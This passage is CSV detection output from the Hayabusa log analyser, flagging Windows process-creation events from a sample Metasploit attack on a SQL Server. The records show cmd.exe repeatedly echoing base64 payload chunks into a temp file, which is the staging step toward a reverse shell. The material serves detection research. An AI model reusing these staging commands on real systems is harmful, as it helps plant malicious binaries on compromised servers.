NlcHRpb25zOiAlZCk8L3RkPjwvdHI+CgAAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RmFpbGVkIHJlcXVlc3Rz>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo IDE5OTYgQWRhbSBUd2lzcywgWmV1cyBUZWNobm9sb2d5IEx0ZCwgaHR0cDovL3d3dy56ZXVzdGVjaC5uZXQvPGJyPgoAACBUaGlzIGlzIEFwYWNoZUJlbmNoLCBWZXJzaW9uICVzIDxpPiZsdDslcyZndDs8L2k+PGJyPgoAJFJldmlzaW9uOiA2NTU2NTQgJAA8cD4KAAAAAAAAAABMaWNlbnNlZCB0byBUaGUgQXBhY2hlIFNvZnR3YXJlIEZvdW5kYXRpb24sIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy8KAAAAAABDb3B5cmlnaHQgMTk5NiBBZGFtIFR3aXNzLCBaZXVzIFRlY2hub2xvZ3kgTHRkLCBodHRwOi8vd3d3LnpldXN0ZWNoLm5ldC8KAAAAVGhpcyBpcyBBcGFjaGVCZW5jaCwgVmVyc2lvbiAlcwoAAAAAMi4zIDwkUmV2aXNpb246IDY1NTY1NCAkPgAAACAgICAtaCAgICAgICAgICAgICAgRGlzcGxheSB1c2FnZSBpbmZvcm1hdGlvbiAodGhpcyBtZXNzYWdlKQoAAAAgICAgLXIgICAgICAgICAgICAgIERvbid0IGV4aXQgb24gc29ja2V0IHJlY2VpdmUgZXJyb3JzLgoAAAAgICAgLWUgZmlsZW5hbWUgICAgIE91dHB1dCBDU1YgZmlsZSB3aXRoIHBlcmNlbnRhZ2VzIHNlcnZlZAoAAAAAICAgIC1nIGZpbGVuYW1lICAgICBPdXRwdXQgY29sbGVjdGVkIGRhdGEgdG8gZ251cGxvdCBmb3JtYXQgZmlsZS4KAAAAAAAAICAgIC1TICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBjb25maWRlbmNlIGVzdGltYXRvcnMgYW5kIHdhcm5pbmdzLgoAAAAAICAgIC1kICAgICAgICAgICAgICBEbyBub3Qgc2hvdyBwZXJjZW50aWxlcyBzZXJ2ZWQgdGFibGUuCgAAICAgIC1rICAgICAgICAgICAgICBVc2UgSFRUUCBLZWVwQWxpdmUgZmVhdHVyZQoAICAgIC1WICAgICAgICAgICAgICBQcmludCB2ZXJzaW9uIG51bWJlciBhbmQgZXhpdAoAACAgICAtWCBwcm94eTpwb3J0ICAgUHJveHlzZXJ2ZXIgYW5kIHBvcnQgbnVtYmVyIHRvIHVzZQoAICAgIC1QIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgUHJveHkgQXV0aGVudGljYXRpb24sIHRoZSBhdHRyaWJ1dGVzCgAAAAAAICAgICAgICAgICAgICAgICAgICBhcmUgYSBjb2xvbiBzZXBhcmF0ZWQgdXNlcm5hbWUgYW5kIHBhc3N3b3JkLgoAAAAAAAAAICAgIC1BIGF0dHJpYnV0ZSAgICBBZGQgQmFzaWMgV1dXIEF1dGhlbnRpY2F0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aW9uLCB0aGUgYXR0cmlidXRlcwoAAAAAAAAAICAgICAgICAgICAgICAgICAgICBJbnNlcnRlZCBhZnRlciBhbGwgbm9ybWFsIGhlYWRlciBsaW5lcy4gKHJlcGVhdGFibGUpCgAAAAAAAAAgICAgLUggYXR0cmlidXRlICAgIEFkZCBBcmJpdHJhcnkgaGVhZGVyIGxpbmUsIGVnLiAnQWNjZXB0LUVuY29kaW5nOiBnemlwJwoAAAAAACAgICAtQyBhdHRyaWJ1dGUgICAgQWRkIGNvb2tpZSwgZWcuICdBcGFjaGU9MTIzNC4gKHJlcGVhdGFibGUpCgAgICAgLXogYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGQgb3IgdGggYXR0cmlidXRlcwoAAAAAICAgIC15IGF0dHJpYnV0ZXMgICBTdHJpbmcgdG8gaW5zZXJ0IGFzIHRyIGF0dHJpYnV0ZXMKAAAgICAgLXggYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGFibGUgYXR0cmlidXRlcwoAAAAgICAgLWkgICAgICAgICAgICAgIFVzZSBIRUFEIGluc3RlYWQgb2YgR0VUCgAAAAAgICAgLXcgICAgICAgICAgICAgIFByaW50IG91dCByZXN1bHRzIGluIEhUTUwgdGFibGVzCgAAACAgICAtdiB2ZXJib3NpdHkgICAgSG93IG11Y2ggdHJvdWJsZXNob290aW5nIGluZm8gdG8gcHJpbnQKACAgICAgICAgICAgICAgICAgICAgRGVmYXVsdCBpcyAndGV4dC9wbGFpbicKAAAAACAgICAgICAgICAgICAgICAgICAgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKAAAAACAgICAtVCBjb250ZW50LXR5cGUgQ29udGVudC10eXBlIGhlYWRlciBmb3IgUE9TVGluZywgZWcuCgAAACAgICAtdSBwdXRmaWxlICAgICAgRmlsZSBjb250YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAAAAAAAAAICAgIC1wIHBvc3RmaWxlICAgICBGaWxlIGNvbnRhaW5pbmcgZGF0YSB0byBQT1NULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAACAgICAtYiB3aW5kb3dzaXplICAgU2l6ZSBvZiBUQ1Agc2VuZC9yZWNlaXZlIGJ1ZmZlciwgaW4gYnl0ZXMKAAAgICAgLXQgdGltZWxpbWl0ICAgIFNlY29uZHMgdG8gbWF4LiB3YWl0IGZvciByZXNwb25zZXMKACAgICAtYyBjb25jdXJyZW5jeSAgTnVtYmVyIG9mIG11bHRpcGxlIHJlcXVlc3RzIHRvIG1ha2UKAAAAACAgICAtbiBy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXF1ZXN0cyAgICAgTnVtYmVyIG9mIHJlcXVlc3RzIHRvIHBlcmZvcm0KAABPcHRpb25zIGFyZToKAAAAVXNhZ2U6ICVzIFtvcHRpb25zXSBbaHR0cDovL11ob3N0bmFtZVs6cG9ydF0vcGF0aAoAADolZABTU0wgbm90IGNvbXBpbGVkIGluOyBubyBodHRwcyBzdXBwb3J0CgAAaHR0cHM6Ly8AAAAAWyVzXQAAAABodHRwOi8vAGFiOiBDb3VsZCBub3QgcmVhZCBQT1NUIGRhdGEgZmlsZTogJXMKAABhYjogQ291bGQgbm90IGFsbG9jYXRlIFBPU1QgZGF0YSBidWZmZXIKAAAAAGFiOiBDb3VsZCBub3Qgc3RhdCBQT1NUIGRhdGEgZmlsZSAoJXMpOiAlcwoAYWI6IENvdWxkIG5vdCBvcGVuIFBPU1QgZGF0YSBmaWxlICglcyk6ICVzCgBhcHJfZ2xvYmFsX3Bvb2wAJWQuJWQlYwAqKioqAAAAACUzZCVjAAAAJTNkIAAAAAAgIC0gAAAAAEtNR1RQRQAAJXM6IGlsbGVnYWwgb3B0aW9uIC0tICVjCgAAACVzOiBvcHRpb24gcmVxdWlyZXMgYW4gYXJndW1lbnQgLS0gJWMKAABDb21tYW5kTGluZVRvQXJndlcAAGFwcl9pbml0aWFsaXplAAAwMTIzNDU2Nzg5LgAwLjAuMC4wAGJvZ3VzICVwAAAAAEk2NGQAAAAATm8gaG9zdCBkYXRhIG9mIHRoYXQgdHlwZSB3YXMgZm91bmQASG9zdCBub3QgZm91bmQAAEdyYWNlZnVsIHNodXRkb3duIGluIHByb2dyZXNzAAAAV1NBU3RhcnR1cCBub3QgeWV0IGNhbGxlZAAAAFdpbnNvY2sgdmVyc2lvbiBvdXQgb2YgcmFuZ2UAAAAATmV0d29yayBzeXN0ZW0gaXMgdW5hdmFpbGFibGUAAABUb28gbWFueSBsZXZlbHMgb2YgcmVtb3RlIGluIHBhdGgAAABTdGFsZSBORlMgZmlsZSBoYW5kbGUAAABEaXNjIHF1b3RhIGV4Y2VlZGVkAFRvbyBtYW55IHVzZXJzAABUb28gbWFueSBwcm9jZXNzZXMAAERpcmVjdG9yeSBub3QgZW1wdHkATm8gcm91dGUgdG8gaG9zdAAAAABIb3N0IGlzIGRvd24AAAAARmlsZSBuYW1lIHRvbyBsb25nAABUb28gbWFueSBsZXZlbHMgb2Ygc3ltYm9saWMgbGlua3MAAABDb25uZWN0aW9uIHJlZnVzZWQAAENvbm5lY3Rpb24gdGltZWQgb3V0AAAAAFRvbyBtYW55IHJlZmVyZW5jZXMsIGNhbid0IHNwbGljZQAAAENhbid0IHNlbmQgYWZ0ZXIgc29ja2V0IHNodXRkb3duAAAAAFNvY2tldCBpcyBub3QgY29ubmVjdGVk>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AFNvY2tldCBpcyBhbHJlYWR5IGNvbm5lY3RlZABObyBidWZmZXIgc3BhY2UgYXZhaWxhYmxlAAAAQ29ubmVjdGlvbiByZXNldCBieSBwZWVyAAAAAFNvZnR3YXJlIGNhdXNlZCBjb25uZWN0aW9uIGFib3J0AAAAAE5ldCBjb25uZWN0aW9uIHJlc2V0AAAAAE5ldHdvcmsgaXMgdW5yZWFjaGFibGUAAE5ldHdvcmsgaXMgZG93bgBDYW4ndCBhc3NpZ24gcmVxdWVzdGVkIGFkZHJlc3MAAEFkZHJlc3MgYWxyZWFkeSBpbiB1c2UAAEFkZHJlc3MgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAAAAUHJvdG9jb2wgZmFtaWx5IG5vdCBzdXBwb3J0ZWQAAABPcGVyYXRpb24gbm90IHN1cHBvcnRlZCBvbiBzb2NrZXQAAABTb2NrZXQgdHlwZSBub3Qgc3VwcG9ydGVkAAAAUHJvdG9jb2wgbm90IHN1cHBvcnRlZAAAQmFkIHByb3RvY29sIG9wdGlvbgBQcm90b2NvbCB3cm9uZyB0eXBlIGZvciBzb2NrZXQAAE1lc3NhZ2UgdG9vIGxvbmcAAAAARGVzdGluYXRpb24gYWRkcmVzcyByZXF1aXJlZAAAAABTb2NrZXQgb3BlcmF0aW9uIG9uIG5vbi1zb2NrZXQAAE9wZXJhdGlvbiBhbHJlYWR5IGluIHByb2dyZXNzAAAAT3BlcmF0aW9uIG5vdyBpbiBwcm9ncmVzcwAAAE9wZXJhdGlvbiB3b3VsZCBibG9jawAAAFRvbyBtYW55IG9wZW4gc29ja2V0cwAAAEludmFsaWQgYXJndW1lbnQAAAAAQmFkIGFkZHJlc3MAUGVybWlzc2lvbiBkZW5pZWQAAABCYWQgZmlsZSBudW1iZXIASW50ZXJydXB0ZWQgc3lzdGVtIGNhbGwAQVBSIGRvZXMgbm90IHVuZGVyc3RhbmQgdGhpcyBlcnJvciBjb2RlAEVycm9yIHN0cmluZyBub3Qgc3BlY2lmaWVkIHlldAAAcGFzc3dvcmRzIGRvIG5vdCBtYXRjaAAAVGhpcyBmdW5jdGlvbiBoYXMgbm90IGJlZW4gaW1wbGVtZW50ZWQgb24gdGhpcyBwbGF0Zm9ybQAAAAAAVGhlcmUgaXMgbm8gZXJyb3IsIHRoaXMgdmFsdWUgc2lnbmlmaWVzIGFuIGluaXRpYWxpemVkIGVycm9yIGNvZGUAAABTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGEga2V5IHN5c3RlbQBTaGFyZWQgbWVtb3J5IGlzIGltcGxlbWVudGVkIHVzaW5nIGZpbGVzAAAAAFNoYXJlZCBtZW1vcnkgaXMgaW1wbGVtZW50ZWQgYW5vbnltb3VzbHkAAAAAQ291bGQgbm90IGZpbmQgc3Bl>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Y2lmaWVkIHNvY2tldCBpbiBwb2xsIGxpc3QuAAAARW5kIG9mIGZpbGUgZm91bmQAAABNaXNzaW5nIHBhcmFtZXRlciBmb3IgdGhlIHNwZWNpZmllZCBjb21tYW5kIGxpbmUgb3B0aW9uAEJhZCBjaGFyYWN0ZXIgc3BlY2lmaWVkIG9uIGNvbW1hbmQgbGluZQBQYXJ0aWFsIHJlc3VsdHMgYXJlIHZhbGlkIGJ1dCBwcm9jZXNzaW5nIGlzIGluY29tcGxldGUAAFRoZSB0aW1lb3V0IHNwZWNpZmllZCBoYXMgZXhwaXJlZAAAAFRoZSBzcGVjaWZpZWQgY2hpbGQgcHJvY2VzcyBpcyBub3QgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIGNoaWxkIHByb2Nlc3MgaXMgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIHRocmVhZCBpcyBub3QgZGV0YWNoZWQAAAAAVGhlIHNwZWNpZmllZCB0aHJlYWQgaXMgZGV0YWNoZWQAAAAAAAAAAFlvdXIgY29kZSBqdXN0IGZvcmtlZCwgYW5kIHlvdSBhcmUgY3VycmVudGx5IGV4ZWN1dGluZyBpbiB0aGUgcGFyZW50IHByb2Nlc3MAAAAAWW91ciBjb2RlIGp1c3QgZm9ya2VkLCBhbmQgeW91IGFyZSBjdXJyZW50bHkgZXhlY3V0aW5nIGluIHRoZSBjaGlsZCBwcm9jZXNzAEludGVybmFsIGVycm9yAABUaGUgcHJvY2VzcyBpcyBub3QgcmVjb2duaXplZC4AAFRoZSBnaXZlbiBwYXRoIGNvbnRhaW5lZCB3aWxkY2FyZCBjaGFyYWN0ZXJzAAAAAFRoZSBnaXZlbiBwYXRoIGlzIG1pc2Zvcm1hdHRlZCBvciBjb250YWluZWQgaW52YWxpZCBjaGFyYWN0ZXJzAABUaGUgZ2l2ZW4gcGF0aCB3YXMgYWJvdmUgdGhlIHJvb3QgcGF0aAAAVGhlIGdpdmVuIHBhdGggaXMgaW5jb21wbGV0ZQAAAABUaGUgZ2l2ZW4gcGF0aCBpcyByZWxhdGl2ZQAAVGhlIGdpdmVuIHBhdGggaXMgYWJzb2x1dGUAAFRoZSBzcGVjaWZpZWQgbmV0d29yayBtYXNrIGlzIGludmFsaWQuAABUaGUgc3BlY2lmaWVkIElQIGFkZHJlc3MgaXMgaW52YWxpZC4AAAAARFNPIGxvYWQgZmFpbGVkAE5vIHNoYXJlZCBtZW1vcnkgaXMgY3VycmVudGx5IGF2YWlsYWJsZQBObyB0aHJlYWQga2V5IHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyB0aHJlYWQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABO>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo byBzb2NrZXQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABObyBwb2xsIHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAAAAAE5vIGxvY2sgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAATm8gZGlyZWN0b3J5IHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4ATm8gdGltZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyBwcm9jZXNzIHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4AAABBbiBpbnZhbGlkIHNvY2tldCB3YXMgcmV0dXJuZWQAAEFuIGludmFsaWQgZGF0ZSBoYXMgYmVlbiBwcm92aWRlZAAAAEEgbmV3IHBvb2wgY291bGQgbm90IGJlIGNyZWF0ZWQuAAAAAFVucmVjb2duaXplZCBXaW4zMiBlcnJvciBjb2RlICVkAAAAAFwAXAA/AFwAVQBOAEMAXAAAAAAAXABcAD8AXAAAAAAAQ2FuY2VsSW8AAAAAR2V0Q29tcHJlc3NlZEZpbGVTaXplQQAAR2V0Q29tcHJlc3NlZEZpbGVTaXplVwAAWndRdWVyeUluZm9ybWF0aW9uRmlsZQAAR2V0U2VjdXJpdHlJbmZvAEdldE5hbWVkU2VjdXJpdHlJbmZvQQAAAEdldE5hbWVkU2VjdXJpdHlJbmZvVwAAAFUATgBDAFwAAAAAAEdldEVmZmVjdGl2ZVJpZ2h0c0Zyb21BY2xXAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////bnRkbGwuZGxsAAAAc2hlbGwzMgB3czJfMzIAAG1zd3NvY2sAYWR2YXBpMzIAAAAAa2VybmVsMzIAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA